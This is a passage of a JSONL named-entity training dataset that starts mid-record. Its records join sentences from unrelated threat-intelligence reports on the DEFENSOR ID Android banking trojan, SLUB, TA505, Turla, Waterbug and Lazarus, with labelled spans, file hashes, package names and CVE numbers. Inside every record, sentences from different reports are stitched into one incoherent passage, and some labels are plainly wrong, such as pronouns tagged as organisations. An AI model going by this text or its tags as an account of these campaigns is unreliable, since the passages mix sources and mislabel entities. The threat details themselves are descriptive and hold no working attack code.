"System"}, {"start": 189, "end": 197, "label": "Malware"}, {"start": 237, "end": 250, "label": "Organization"}]} {"text": "Internet users should keep on securing their activities with good security solutions for both computers and mobile devices. 
\u201d Hashes : E5212D4416486AF42E7ED1F58A526AEF77BE89BE A9891222232145581FE8D0D483EDB4B18836BCFC AFF9F39A6CA5D68C599B30012D79DA29E2672C6E Insidious Android malware gives up all malicious features but one to gain stealth ESET researchers detect a new way of misusing Accessibility Three years ago , the Sednit group unleashed new components targeting victims in various countries in the Middle East and Central Asia . The design of KiloAlfa is broken down into two basic components : the persistence functionality and the keylogging functionality .", "spans": [{"start": 135, "end": 175, "label": "Indicator"}, {"start": 176, "end": 216, "label": "Indicator"}, {"start": 217, "end": 257, "label": "Indicator"}, {"start": 268, "end": 275, "label": "System"}, {"start": 340, "end": 344, "label": "Organization"}, {"start": 422, "end": 428, "label": "Organization"}, {"start": 551, "end": 559, "label": "Malware"}, {"start": 641, "end": 665, "label": "Malware"}]} {"text": "Service , the Achilles \u2019 heel of Android security 22 May 2020 - 03:00PM ESET researchers have analyzed an extremely dangerous Android app that can perform a host of nefarious actions , notably wiping out the victim \u2019 s bank account or cryptocurrency wallet and taking over their email or social media accounts . In the past , Sednit used a similar technique for credential phishing . The persistence functionality of KiloAlfa allows the malware to self-install on a victim 's machine when activated ( described below ) .", "spans": [{"start": 33, "end": 40, "label": "System"}, {"start": 72, "end": 76, "label": "Organization"}, {"start": 126, "end": 133, "label": "System"}, {"start": 326, "end": 332, "label": "Organization"}, {"start": 417, "end": 425, "label": "Malware"}]} {"text": "Called \u201c DEFENSOR ID \u201d , the banking trojan was available on Google Play at the time of the analysis . 
At the end of August 2018 , the Sednit group launched a spearphishing email campaign where it distributed shortened URLs that delivered the first stage of Zebrocy components . Evidence suggest that the Lazarus Group uses compromised infrastructure as the public-facing touchpoint for the majority of their malware samples .", "spans": [{"start": 9, "end": 20, "label": "Malware"}, {"start": 61, "end": 72, "label": "System"}, {"start": 305, "end": 318, "label": "Organization"}, {"start": 324, "end": 350, "label": "Malware"}]} {"text": "The app is fitted with standard information-stealing capabilities ; however , this banker is exceptionally insidious in that after installation it requires a single action from the victim \u2013 enable Android \u2019 s Accessibility Service \u2013 to fully unleash the app \u2019 s malicious functionality . As we explained in our most recent blogpost about Zebrocy , the configuration of the backdoor is stored in in the resource section and is split into four different hex-encoded , encrypted blobs . PapaAlfa is believed to be one of the proxy malware components that the Lazarus Group uses to hide the true command and control server for operations .", "spans": [{"start": 197, "end": 204, "label": "System"}, {"start": 291, "end": 293, "label": "Organization"}, {"start": 338, "end": 345, "label": "Organization"}, {"start": 373, "end": 381, "label": "System"}, {"start": 484, "end": 492, "label": "Malware"}, {"start": 556, "end": 569, "label": "Organization"}]} {"text": "The DEFENSOR ID app made it onto the heavily guarded Google Play store thanks to its extreme stealth . The past iteration of SLUB spread from a unique watering hole website exploiting CVE-2018-8174 , a VBScript engine vulnerability . 
Rather , PapaAlfa could be considered a smart proxy due in part to the fact that the Lazarus can easily switch the backend destination address and PROT without having to reestablish control over the infected machine hosting the PapaAlfa malware .", "spans": [{"start": 4, "end": 15, "label": "Malware"}, {"start": 53, "end": 70, "label": "System"}, {"start": 125, "end": 129, "label": "Organization"}, {"start": 184, "end": 197, "label": "Vulnerability"}, {"start": 243, "end": 251, "label": "Malware"}, {"start": 319, "end": 326, "label": "Organization"}, {"start": 462, "end": 470, "label": "Malware"}, {"start": 471, "end": 478, "label": "Malware"}]} {"text": "Its creators reduced the app \u2019 s malicious surface to the bare minimum by removing all potentially malicious functionalities but one : abusing Accessibility Service . It used GitHub and Slack as tools for communication between the malware and its controller . In terms of form factor , PapaAlfa comes in two flavors : service DLL and standalone executable .", "spans": [{"start": 167, "end": 169, "label": "Organization"}, {"start": 175, "end": 181, "label": "System"}, {"start": 186, "end": 191, "label": "System"}, {"start": 286, "end": 294, "label": "Malware"}, {"start": 318, "end": 329, "label": "Malware"}, {"start": 334, "end": 355, "label": "Malware"}]} {"text": "Accessibility Service is long known to be the Achilles \u2019 heel of the Android operating system . On July 9 , we discovered a new version of SLUB delivered via another unique watering hole website . 
The IndiaBravo-PapaAlfa installer is responsible for installing the service DLL variant .", "spans": [{"start": 69, "end": 76, "label": "System"}, {"start": 108, "end": 110, "label": "Organization"}, {"start": 139, "end": 143, "label": "Organization"}, {"start": 201, "end": 230, "label": "Malware"}, {"start": 273, "end": 276, "label": "System"}]} {"text": "Security solutions can detect it in countless combinations with other suspicious permissions and functions , or malicious functionalities \u2013 but when faced with no additional functionality nor permission , all failed to trigger any alarm on DEFENSOR ID . This malicious site used CVE-2019-0752 , an Internet Explorer vulnerability discovered by Trend Micro\u2019s Zero Day Initiative (ZDI) that was just patched this April . While the tools profiled in this report are not inherently malicious , their capabilities are nonetheless integral to the Lazarus Group 's cyber operations , both espionage and destructive in nature , making them inherently dangerous to potential victims .", "spans": [{"start": 240, "end": 251, "label": "Malware"}, {"start": 279, "end": 292, "label": "Vulnerability"}, {"start": 344, "end": 357, "label": "Organization"}, {"start": 541, "end": 554, "label": "Organization"}]} {"text": "By \u201c all \u201d we mean all security mechanisms guarding the official Android app store ( including the detection engines of the members of the App Defense Alliance ) and all security vendors participating in the VirusTotal program ( see Figure 1 ) . Since we published out last report on SLUB , the backdoor has been updated and several improvements were implemented . 
These tools often lay the groundwork for further malicious activity , such as the targeting of antivirus capabilities and the disabling of firewalls , both of which are very fundamental defensive measures .", "spans": [{"start": 65, "end": 82, "label": "System"}, {"start": 139, "end": 159, "label": "Organization"}, {"start": 208, "end": 218, "label": "Organization"}, {"start": 252, "end": 254, "label": "Organization"}, {"start": 284, "end": 288, "label": "Organization"}, {"start": 295, "end": 303, "label": "System"}]} {"text": "DEFENSOR ID was released on Feb 3 , 2020 and last updated to v1.4 on May 6 , 2020 . The SLUB malware was delivered through watering hole websites that were injected with exploits for CVE-2018-8174 or CVE-2019-0752 . Furthermore , like many other identified Lazarus Group families , these tools showcase the group 's creative solutions , such as the PapaAlfa , which makes it difficult to immediately identify potentially malicious activity on a compromised network .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 88, "end": 92, "label": "Organization"}, {"start": 183, "end": 196, "label": "Vulnerability"}, {"start": 200, "end": 213, "label": "Vulnerability"}, {"start": 257, "end": 270, "label": "Organization"}, {"start": 349, "end": 357, "label": "Malware"}]} {"text": "The latest version is analyzed here ; we weren \u2019 t able to determine if the earlier versions were also malicious . During this attack , we found that the SLUB malware used two Slack teams sales-yww9809\u201d and marketing-pwx7789 . The first class , colloquially known as \" wipers \" , are a class of malware has the primary intent of destroying data on a victim 's machine .", "spans": [{"start": 154, "end": 158, "label": "Organization"}, {"start": 269, "end": 275, "label": "Malware"}]} {"text": "According to its profile at Google Play ( see Figure 2 ) the app reached a mere 10+ downloads . 
SWEED remains consistent across most of their campaigns in their use of spear-phishing emails with malicious attachments . DDoS malware floods a target 's network-connected service with an excessive number of request at once in order to overload the capacity of the server .", "spans": [{"start": 28, "end": 39, "label": "System"}, {"start": 96, "end": 101, "label": "Organization"}, {"start": 219, "end": 223, "label": "Malware"}, {"start": 224, "end": 231, "label": "Malware"}]} {"text": "We reported it to Google on May 16 , 2020 and since May 19 , 2020 the app has no longer been available on Google Play . In April 2018 , SWEED began making use of a previously disclosed Office exploit . For example , DeltaAlfa specifies a DDoS bot family identified as Alfa .", "spans": [{"start": 18, "end": 24, "label": "Organization"}, {"start": 106, "end": 117, "label": "System"}, {"start": 136, "end": 141, "label": "Organization"}, {"start": 216, "end": 225, "label": "Indicator"}, {"start": 238, "end": 246, "label": "Malware"}]} {"text": "The developer name used , GAS Brazil , suggests the criminals behind the app targeted Brazilian users . In May 2018 , campaigns being conducted by SWEED began leveraging another vulnerability in Microsoft Office: CVE-2017-11882 , a remote code execution bug in Microsoft Office that is commonly observed being leveraged in malicious documents used in commodity malware distribution . 
The naming scheme used by Novetta for the malware identified during Operation Blockbuster consists of at least two identifiers which each identifier coming from the International Civil Aviation Organization ( ICAO ) 's phonetic alphabet ,2 commonly referred to as the NATO phonetic alphabet .", "spans": [{"start": 147, "end": 152, "label": "Organization"}, {"start": 213, "end": 227, "label": "Vulnerability"}, {"start": 410, "end": 417, "label": "Organization"}, {"start": 549, "end": 590, "label": "Organization"}, {"start": 593, "end": 597, "label": "Organization"}]} {"text": "Apart from including the country \u2019 s name , the app \u2019 s name is probably intended to imply a relationship with the antifraud solution named GAS Tecnologia . We found them targeting countries in the Middle East such as United Arab Emirates and Saudi Arabia , as well as other countries such as India , Japan , Argentina , the Philippines , and South Korea . Loaders are typically responsible for loading a DLL component into memory given that a DLL cannot operate in a standalone mode such as an executable .", "spans": [{"start": 140, "end": 154, "label": "System"}, {"start": 166, "end": 170, "label": "Organization"}, {"start": 405, "end": 408, "label": "System"}, {"start": 444, "end": 447, "label": "System"}]} {"text": "That security software is commonly installed on computers in Brazil as several banks require it to log into their online banking . Similar to previous campaigns , the JAR was directly attached to emails and used file names such as Order_2018.jar . 
This report will explore the various installers , uninstallers and loaders Novetta has observed the Lazarus Group using .", "spans": [{"start": 167, "end": 170, "label": "Malware"}, {"start": 231, "end": 245, "label": "System"}, {"start": 285, "end": 295, "label": "Malware"}, {"start": 298, "end": 310, "label": "Malware"}, {"start": 323, "end": 330, "label": "Organization"}, {"start": 348, "end": 361, "label": "Organization"}]} {"text": "However , there is also an English version of the DEFENSOR ID app ( see Figure 3 ) besides the Portuguese one , and that app has neither geographical nor language restrictions . Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . This reverse engineering report looks at the RATs and staging malware found within the Lazarus Group 's collection .", "spans": [{"start": 50, "end": 61, "label": "Malware"}, {"start": 211, "end": 217, "label": "Malware"}, {"start": 242, "end": 255, "label": "Vulnerability"}, {"start": 299, "end": 323, "label": "System"}, {"start": 371, "end": 375, "label": "Malware"}, {"start": 380, "end": 387, "label": "Malware"}, {"start": 388, "end": 395, "label": "Malware"}, {"start": 413, "end": 426, "label": "Organization"}]} {"text": "Playing further off the suggested GAS Tecnologia link , the app promises better security for its users . TA505 is also using FlowerPippi (Backdoor.Win32.FLOWERPIPPI.A) , a new backdoor that we found them using in their campaigns against targets in Japan , India , and Argentina . 
Regardless of their sophistication or refinement , the malware families within the Lazarus Group 's India and Lima classes perform at a reasonable level for their designed purpose : the introduction and persistence of malware from the Lazarus Group on a victim 's infrastructure .", "spans": [{"start": 34, "end": 48, "label": "System"}, {"start": 105, "end": 110, "label": "Organization"}, {"start": 125, "end": 136, "label": "System"}, {"start": 176, "end": 184, "label": "System"}, {"start": 363, "end": 376, "label": "Organization"}, {"start": 515, "end": 528, "label": "Organization"}]} {"text": "The description in Portuguese promises more protection for the user \u2019 s applications , including end-to-end encryption . TA505 targeted Middle Eastern countries in a June 11 campaign that delivered more than 90% of the total spam emails to the UAE , Saudi Arabia , and Morroco . While the capabilities for the installers , loaders , and uninstallers in this report are relatively straight forward and single-focused , analysis of these malware families provide further insight into the capabilities of the Lazarus Group .", "spans": [{"start": 121, "end": 126, "label": "Organization"}, {"start": 310, "end": 320, "label": "Malware"}, {"start": 323, "end": 330, "label": "Malware"}, {"start": 337, "end": 349, "label": "Malware"}, {"start": 506, "end": 519, "label": "Organization"}]} {"text": "Deceptively , the app was listed in the Education section . It fetches the same FlawedAmmyy downloader .msi file , then downloads the FlawedAmmyy payload . 
The Lazarus Group employs a variety of RATs that operate in both client mode and server mode .", "spans": [{"start": 60, "end": 62, "label": "Organization"}, {"start": 134, "end": 153, "label": "System"}, {"start": 160, "end": 173, "label": "Organization"}, {"start": 195, "end": 199, "label": "Malware"}]} {"text": "Functionality After starting , DEFENSOR ID requests the following permissions : allow modify system settings permit drawing over other apps , and activate accessibility services . TA505 used Wizard (.wiz) files in this campaign , with FlawedAmmyy RAT as the final payload . The most common communication mode for a RAT is to act as a client to a remote server .", "spans": [{"start": 31, "end": 42, "label": "Malware"}, {"start": 180, "end": 185, "label": "Organization"}, {"start": 191, "end": 210, "label": "System"}, {"start": 235, "end": 250, "label": "System"}, {"start": 315, "end": 318, "label": "Malware"}]} {"text": "If an unsuspecting user grants these permissions ( see Figure 4 ) , the trojan can read any text displayed in any app the user may launch \u2013 and send it to the attackers . On June 14 , we saw TA505\u2019s campaign still targeting UAE with similar tactics and techniques , but this time , some of the spam emails were delivered via the Amadey botnet . 
The Lazarus Group employs a variety of RATs and staging malware to conduct cyber operations , many of which contain significant code overlap that points to at least a shared development environment .", "spans": [{"start": 191, "end": 198, "label": "Organization"}, {"start": 329, "end": 342, "label": "System"}, {"start": 349, "end": 362, "label": "Organization"}, {"start": 384, "end": 388, "label": "Malware"}, {"start": 393, "end": 400, "label": "Malware"}, {"start": 401, "end": 408, "label": "Malware"}]} {"text": "This means the attackers can steal the victim \u2019 s credentials for logging into apps , SMS and email messages , displayed cryptocurrency private keys , and even software-generated 2FA codes . It later delivered an information stealer named EmailStealer , \u201d which stolesimple mail transfer protocol (SMTP) credentials and email addresses in the victim\u2019s machine . While some members within the Romeo and Sierra groups may not implement sound authentication strategies , shift their design focus in abrupt and unusual manners , and fail to understand the pitfalls of distributed command networks , on the whole the families within the Lazarus Group 's collection of RATs and staging malware perform their tasks with surprising effectiveness .", "spans": [{"start": 191, "end": 193, "label": "Organization"}, {"start": 239, "end": 251, "label": "System"}, {"start": 392, "end": 397, "label": "Organization"}, {"start": 402, "end": 415, "label": "Organization"}, {"start": 632, "end": 645, "label": "Organization"}, {"start": 663, "end": 667, "label": "Malware"}, {"start": 672, "end": 679, "label": "Malware"}, {"start": 680, "end": 687, "label": "Malware"}]} {"text": "The fact the trojan can steal both the victim \u2019 s credentials and also can control their SMS messages and generated 2FA codes means DEFENSOR ID \u2019 s operators can bypass two-factor authentication . 
On June 18 , the majority of the campaign\u2019s spam emails were sent with the subject , Your RAKBANK Tax Invoice / Tax Credit Note\u201d or Confirmation . This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets Bitcoin users and global financial organizations .", "spans": [{"start": 132, "end": 143, "label": "Malware"}, {"start": 388, "end": 395, "label": "Organization"}, {"start": 416, "end": 422, "label": "System"}, {"start": 473, "end": 486, "label": "Organization"}, {"start": 498, "end": 521, "label": "Organization"}]} {"text": "This opens the door to , for example , fully controlling the victim \u2019 s bank account . This campaign used the abovementioned .html file , malicious Excel/Word document VBA macro , the FlawedAmmyy payload , and Amadey . This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets financial organizations .", "spans": [{"start": 172, "end": 177, "label": "System"}, {"start": 184, "end": 203, "label": "System"}, {"start": 210, "end": 216, "label": "System"}, {"start": 263, "end": 270, "label": "Organization"}, {"start": 291, "end": 297, "label": "System"}, {"start": 348, "end": 371, "label": "Organization"}]} {"text": "To make sure the trojan survives a device restart , it abuses already activated accessibility services that will launch the trojan right after start . On June 24 , we found another campaign targeting Lebanon with the ServHelper malware . 
McAfee Advanced Threat Research analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact .", "spans": [{"start": 217, "end": 227, "label": "Malware"}, {"start": 238, "end": 269, "label": "Organization"}, {"start": 382, "end": 389, "label": "Organization"}, {"start": 400, "end": 413, "label": "Malware"}, {"start": 414, "end": 421, "label": "Malware"}]} {"text": "Our analysis shows the DEFENSOR ID trojan can execute 17 commands received from the attacker-controlled server such as uninstalling an app , launching an app and then performing any click/tap action controlled remotely by the attacker ( see Figure 5 ) . On June 17 , we observed the campaign\u2019s spam emails delivering malware-embedded Excel files directly as an attachment . McAfee Advanced Threat Research ( ATR ) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact .", "spans": [{"start": 23, "end": 34, "label": "Malware"}, {"start": 374, "end": 405, "label": "Organization"}, {"start": 408, "end": 411, "label": "Organization"}, {"start": 526, "end": 533, "label": "Organization"}, {"start": 544, "end": 557, "label": "Malware"}, {"start": 558, "end": 565, "label": "Malware"}]} {"text": "In 2018 , we saw similar behavior , but all the click actions were hardcoded and suited only for the app of the attacker \u2019 s choice . On June 20 , we spotted the campaign\u2019s spam emails delivering .doc and .xls files . 
Beginning in 2017 , the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters which contained malicious documents .", "spans": [{"start": 147, "end": 149, "label": "Organization"}, {"start": 242, "end": 255, "label": "Organization"}, {"start": 305, "end": 311, "label": "System"}, {"start": 326, "end": 340, "label": "Organization"}]} {"text": "In this case , the attacker can get the list of all installed apps and then remotely launch the victim \u2019 s app of their choice to either steal credentials or perform malicious actions ( e.g . Nonetheless , these spam emails were not delivered to the UAE or Arabic-speaking users , but to banks in Asian countries such as India , Indonesia , and the Philippines . The use of decoy documents also reveals some of the potential targets of the Lazarus group 's malicious activity , specifically the use spear phishing attacks observed targeting South Korean government and aerospace organizations .", "spans": [{"start": 212, "end": 223, "label": "Malware"}, {"start": 288, "end": 293, "label": "Organization"}, {"start": 374, "end": 389, "label": "Malware"}, {"start": 440, "end": 453, "label": "Organization"}, {"start": 554, "end": 564, "label": "Organization"}, {"start": 569, "end": 592, "label": "Organization"}]} {"text": "send funds via a wire transfer ) . After our analysis , we found that Proofpoint reported this malware as AndroMut as well . The campaign lasted from April to October and used job descriptions relevant to target organizations , in both English and Korean language .", "spans": [{"start": 56, "end": 58, "label": "Organization"}, {"start": 70, "end": 80, "label": "Organization"}, {"start": 106, "end": 114, "label": "Organization"}]} {"text": "We believe that this is the reason the DEFENSOR ID trojan requests the user to allow \u201c Modify system settings \u201d . 
In the campaign that targeted Japan , Philippines , and Argentina on June 20 , we found what seems to be a new , undisclosed malware , which we named Gelup . The Lazarus Group 's objective was to gain access to the target 's environment and obtain key military program insight or steal money .", "spans": [{"start": 39, "end": 50, "label": "Malware"}, {"start": 264, "end": 269, "label": "Malware"}, {"start": 276, "end": 289, "label": "Organization"}]} {"text": "Subsequently , the malware will change the screen off time-out to 10 minutes . Another new malware we found that TA505 is using in their campaigns last June 20 against targets in Japan , the Philippines , and Argentina is FlowerPippi . In this latest discovery by McAfee , despite a short pause in similar operations , the Lazarus group targets financial organizations .", "spans": [{"start": 113, "end": 118, "label": "Organization"}, {"start": 222, "end": 233, "label": "System"}, {"start": 264, "end": 270, "label": "Organization"}, {"start": 323, "end": 336, "label": "Organization"}, {"start": 345, "end": 368, "label": "Organization"}]} {"text": "This means that , unless victims lock their devices via the hardware button , the timer provides plenty of time for the malware to remotely perform malicious , in-app operations . The malicious email contains a highly suspicious sample which triggered the ZLAB team to investigate its capabilities and its possible attribution , discovering a potential expansion of the TA505 operation . This campaign is tailored to identifying those who are running Bitcoin related software through specific system scans .", "spans": [{"start": 256, "end": 260, "label": "Organization"}, {"start": 370, "end": 375, "label": "Organization"}, {"start": 451, "end": 458, "label": "System"}]} {"text": "If the device gets locked , the malware can \u2019 t unlock it . 
The attack , as stated by CyberInt , leveraged a command and control server located in Germany related to the TA505 actor: a very active group involved in cyber-criminal operation all around the world , threatening a wide range of high profile companies , active since 2014 . This Malware Analysis Report ( MAR ) is the result of analytic efforts between the Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) .", "spans": [{"start": 170, "end": 175, "label": "Organization"}, {"start": 291, "end": 313, "label": "Organization"}, {"start": 419, "end": 450, "label": "Organization"}, {"start": 453, "end": 456, "label": "Organization"}, {"start": 467, "end": 498, "label": "Organization"}, {"start": 501, "end": 504, "label": "Organization"}]} {"text": "Malware data leak When we analyzed the sample , we realized that the malware operators left the remote database with some of the victims \u2019 data freely accessible , without any authentication . The comparison of the infection chains reveals in both cases TA505 used a couple of SFX stages to deploy the RMS\u201d software: a legitimate remote administration tool produced by the Russian company TektonIT . When victims open malicious documents attached to the emails , the malware scans for Bitcoin activity and then establishes an implant for long-term data-gathering .", "spans": [{"start": 254, "end": 259, "label": "Organization"}, {"start": 454, "end": 460, "label": "System"}]} {"text": "The database contained the last activity performed on around 60 compromised devices . The TA505 group is one of the most active threat groups operating since 2014 , it has traditionally targeted Banking and Retail industries , as we recently documented during the analysis of the Stealthy Email Stealer\u201d part of their arsenal . 
According to trusted third-party reporting , HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace , telecommunications , and finance industries .", "spans": [{"start": 90, "end": 95, "label": "Organization"}, {"start": 195, "end": 202, "label": "Organization"}, {"start": 207, "end": 213, "label": "Organization"}, {"start": 373, "end": 392, "label": "Organization"}, {"start": 416, "end": 425, "label": "Malware"}, {"start": 426, "end": 433, "label": "Malware"}, {"start": 459, "end": 468, "label": "Organization"}, {"start": 471, "end": 489, "label": "Organization"}, {"start": 496, "end": 514, "label": "Organization"}]} {"text": "We found no other information stolen from the victims to be accessible . Also , some code pieces are directly re-used in the analyzed campaigns , such as the i.cmd and exit.exe files , and , at the same time , some new components have been introduced , for instance the rtegre.exe\u201d and the veter1605_MAPS_10cr0.exe file . The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control ( C2 ) server to a victim 's system via dual proxies .", "spans": [{"start": 158, "end": 163, "label": "Malware"}, {"start": 168, "end": 176, "label": "Malware"}, {"start": 270, "end": 281, "label": "Malware"}, {"start": 290, "end": 314, "label": "Malware"}, {"start": 356, "end": 359, "label": "Malware"}, {"start": 392, "end": 398, "label": "Organization"}, {"start": 438, "end": 440, "label": "System"}]} {"text": "Thanks to this data leak , we were able to confirm that the malware really worked as designed : the attacker had access to the victims \u2019 entered credentials , displayed or written emails and messages , etc . In 2018 , Kaspersky Labs published a report that analyzed a Turla PowerShell loader that was based on the open-source project Posh-SecMod . 
FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware or as a file downloaded unknowingly by users when visiting sites compromised by HIDDEN COBRA actors .", "spans": [{"start": 218, "end": 227, "label": "Organization"}, {"start": 268, "end": 273, "label": "Organization"}, {"start": 274, "end": 291, "label": "System"}, {"start": 348, "end": 357, "label": "Malware"}, {"start": 412, "end": 432, "label": "Malware"}, {"start": 513, "end": 532, "label": "Organization"}]} {"text": "Once we reached the non-secured database , we were able to directly observe the app \u2019 s malicious behavior . Turla is believed to have been operating since at least 2008 , when it successfully breached the US military . HIDDEN COBRA actors use an external tool or dropper to install the FALLCHILL malware to establish persistence .", "spans": [{"start": 109, "end": 114, "label": "Organization"}, {"start": 209, "end": 217, "label": "Organization"}, {"start": 220, "end": 239, "label": "Organization"}, {"start": 247, "end": 260, "label": "Malware"}, {"start": 264, "end": 271, "label": "Malware"}, {"start": 287, "end": 296, "label": "Malware"}, {"start": 297, "end": 304, "label": "Malware"}]} {"text": "To illustrate the level of threat the DEFENSOR ID app posed , we performed three tests . This is not the first time Turla has used PowerShell in-memory loaders to increase its chances of bypassing security products . HIDDEN COBRA actors install the FALLCHILL malware to establish persistence .", "spans": [{"start": 38, "end": 49, "label": "Malware"}, {"start": 116, "end": 121, "label": "Organization"}, {"start": 131, "end": 141, "label": "System"}, {"start": 217, "end": 236, "label": "Organization"}, {"start": 249, "end": 258, "label": "Malware"}, {"start": 259, "end": 266, "label": "Malware"}]} {"text": "First , we launched a banking app and entered the credentials there . 
However , it is likely the same scripts are used more globally against many traditional Turla targets in Western Europe and the Middle East . Working with U.S. government partners , DHS and FBI identified Internet Protocol ( IP ) addresses and other indicators of compromise ( IOCs ) associated with a remote administration tool ( RAT ) used by the North Korean government\u2014commonly known as FALLCHILL .", "spans": [{"start": 158, "end": 163, "label": "Organization"}, {"start": 230, "end": 240, "label": "Organization"}, {"start": 252, "end": 255, "label": "Organization"}, {"start": 260, "end": 263, "label": "Organization"}, {"start": 275, "end": 292, "label": "Indicator"}, {"start": 295, "end": 297, "label": "Indicator"}, {"start": 372, "end": 398, "label": "Malware"}, {"start": 401, "end": 404, "label": "Malware"}, {"start": 461, "end": 470, "label": "Malware"}]} {"text": "The credentials were immediately available in the leaky database \u2013 see Figure 6 . In some samples deployed since March 2019 , Turla developers modified their PowerShell scripts in order to bypass the Antimalware Scan Interface (AMSI) . This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL .", "spans": [{"start": 126, "end": 131, "label": "Organization"}, {"start": 250, "end": 259, "label": "Indicator"}, {"start": 268, "end": 280, "label": "Organization"}, {"start": 303, "end": 312, "label": "Malware"}]} {"text": "Figure 6 . Based on our research , SWEED \u2014 which has been operating since at least 2017 \u2014 primarily targets their victims with stealers and remote access trojans . 
McAfee Advanced Threat Research analysts have uncovered a global data reconnaissance campaign assaulting a wide number of industries including critical infrastructure , entertainment , finance , health care , and telecommunications .", "spans": [{"start": 35, "end": 40, "label": "Organization"}, {"start": 164, "end": 195, "label": "Organization"}, {"start": 307, "end": 330, "label": "Organization"}, {"start": 333, "end": 346, "label": "Organization"}, {"start": 349, "end": 356, "label": "Organization"}, {"start": 359, "end": 370, "label": "Organization"}, {"start": 377, "end": 395, "label": "Organization"}]} {"text": "The banking app test : the credentials as entered ( left ) and as available in the database ( right ) Second , we wrote a test message in an email client . It is interesting to note that Turla operators used the free email provider GMX again , as in the Outlook Backdoor and in LightNeuron . Because of this , additional HIDDEN COBRA malware may be present on systems compromised with FALLCHILL .", "spans": [{"start": 187, "end": 192, "label": "Organization"}, {"start": 254, "end": 270, "label": "System"}, {"start": 278, "end": 289, "label": "System"}, {"start": 321, "end": 341, "label": "Malware"}, {"start": 385, "end": 394, "label": "Malware"}]} {"text": "We saw the message uploaded to the attackers \u2019 server within a second \u2013 see Figure 7 . This new research confirms our forecast and shows that the Turla group does not hesitate to use open-source pen-testing frameworks to conduct intrusion . This campaign , dubbed Operation GhostSecret , leverages multiple implants , tools , and malware variants associated with the state-sponsored cyber group HIDDEN COBRA .", "spans": [{"start": 146, "end": 151, "label": "Organization"}, {"start": 207, "end": 217, "label": "System"}, {"start": 395, "end": 407, "label": "Organization"}]} {"text": "Figure 7 . 
Neptun is installed on Microsoft Exchange servers and is designed to passively listen for commands from the attackers . From March 18 to 26 we observed the malware operating in multiple LOCs of the world .", "spans": [{"start": 11, "end": 17, "label": "Malware"}, {"start": 90, "end": 109, "label": "Malware"}, {"start": 119, "end": 128, "label": "Organization"}]} {"text": "The email message test : the message as written ( left ) and as available in the database ( right ) Third , we documented the trojan retrieving the Google Authenticator 2FA code . One attack during this campaign involved the use of infrastructure belonging to another espionage group known as Crambus aka OilRig , APT34 . Furthermore , the Advanced Threat Research team has discovered Proxysvc , which appears to be an undocumented implant .", "spans": [{"start": 148, "end": 168, "label": "System"}, {"start": 293, "end": 300, "label": "Organization"}, {"start": 305, "end": 311, "label": "Organization"}, {"start": 314, "end": 319, "label": "Organization"}, {"start": 340, "end": 364, "label": "Organization"}, {"start": 385, "end": 393, "label": "Malware"}]} {"text": "Figure 8 . Waterbug has been using Meterpreter since at least early 2018 and , in this campaign , used a modified version of Meterpreter , which was encoded and given a .wav extension in order to disguise its true purpose . 
Our investigation into this campaign reveals that the actor used multiple malware implants , including an unknown implant with capabilities similar to Bankshot .", "spans": [{"start": 11, "end": 19, "label": "Organization"}, {"start": 35, "end": 46, "label": "System"}, {"start": 125, "end": 136, "label": "System"}, {"start": 278, "end": 283, "label": "Organization"}, {"start": 375, "end": 383, "label": "Malware"}]} {"text": "The software generated 2FA code as it appeared on the device \u2019 s display ( left ) and as available in the database ( right ) Along with the malicious DEFENSOR ID app , another malicious app named Defensor Digital was discovered . In all likelihood , Waterbug\u2019s use of Crambus infrastructure appears to have been a hostile takeover . The attackers behind Operation GhostSecret used a similar infrastructure to earlier threats , including SSL certificates used by FakeTLS in implants found in the Destover backdoor variant known as Escad , which was used in the Sony Pictures attack .", "spans": [{"start": 196, "end": 212, "label": "Malware"}, {"start": 250, "end": 260, "label": "Organization"}, {"start": 268, "end": 290, "label": "System"}, {"start": 337, "end": 346, "label": "Organization"}, {"start": 437, "end": 453, "label": "Malware"}, {"start": 462, "end": 469, "label": "Malware"}, {"start": 495, "end": 512, "label": "Malware"}, {"start": 530, "end": 535, "label": "Malware"}]} {"text": "Both apps shared the same C & C server , but we couldn \u2019 t investigate the latter as it had already been removed from the Google Play store . One of the most interesting things to occur during one of Waterbug\u2019s recent campaigns was that during an attack against one target in the Middle East , Waterbug appeared to hijack infrastructure from the Crambus espionage group and used it to deliver malware on to the victim\u2019s network . 
Based on our analysis of public and private information from submissions , along with product telemetry , it appears Proxysvc was used alongside the 2017 Destover variant and has operated undetected since mid-2017 .", "spans": [{"start": 122, "end": 139, "label": "System"}, {"start": 200, "end": 210, "label": "Organization"}, {"start": 294, "end": 302, "label": "Organization"}, {"start": 364, "end": 369, "label": "Organization"}, {"start": 547, "end": 555, "label": "Malware"}, {"start": 584, "end": 592, "label": "Malware"}]} {"text": "Indicators of Compromise ( IoCs ) Package Name Hash ESET detection name com.secure.protect.world F17AEBC741957AA21CFE7C7D7BAEC0900E863F61 Android/Spy.BanBra.A com.brazil.android.free EA069A5C96DC1DB0715923EB68192FD325F3D3CE Android/Spy.BanBra.A MITRE ATT & CK techniques Tactic ID Name Description Initial Access T1475 Deliver Malicious App These three recent Waterbug campaigns have seen the group compromise governments and international organizations across the globe in addition to targets in the IT and education sectors . 
